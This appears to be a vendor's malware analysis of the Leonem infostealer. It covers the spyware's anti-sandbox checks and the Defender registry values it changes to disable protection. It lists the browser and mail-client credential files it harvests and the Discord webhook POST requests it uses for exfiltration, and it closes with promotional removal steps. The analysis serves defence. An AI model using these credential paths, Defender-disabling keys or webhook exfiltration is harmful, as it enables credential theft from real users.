Trojan:Win32/Leonem is a spyware that targets any login data on a compromised system, including saved data in browsers and email clients. It primarily spreads through malicious documents or disguised as legitimate software.
Trojan:Win32/Leonem Overview
Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims at stealing sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks other stored login credentials, stored in the compromised system, including those in email clients.
As for the payload, Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled add-ons with legitimate software from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.
Technical Analysis
Let’s now take a deeper analysis of the threat on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:
%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Leonem retrieves BIOS information using WMI queries, specifically targeting Win32_Bios and Win32_NetworkAdapter. Additionally, it exploits the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.
Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all this, Leonem abuses the following legitimate processes and checks the following key values and system locations:
C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning
Data Collection
After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep auth details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text from the keyboard. It specifically targets the following file path:
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\\AppData\Local\360Chrome\Chrome\User Data
C:\Users\\AppData\Local\Chromium\User Data
C:\Users\\AppData\Local\Mailbird\Store\Store.db
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
C:\Users\\AppData\Local\Microsoft\Edge\User Data\Login Data
C:\Users\\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage C:\Users\\AppData\Local\Torch\User Data
C:\Users\\AppData\Local\UCBrowser\
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json
C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\signons.sqlite
C:\Users\\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Users\\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\\AppData\Roaming\Thunderbird\profiles.ini Leonem collects data both in plain text and in the form of a hash.
Data Exfiltration
At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80. This confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to the said webhooks.
POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404
The 200 status at the end means that the request was successfully completed, and the 404 on the other hand indicates an error. This likely indicates that the webhook has either been deleted or changed. In addition, the malware utilizes the ip-api.com service to retrieve details about the hosting environment where it is executed. In this way, it tries to determine whether it is running on the server used for hosting or on a regular computer.
How To Remove Trojan:Win32/Leonem?
As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:
Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.
After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.
Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.
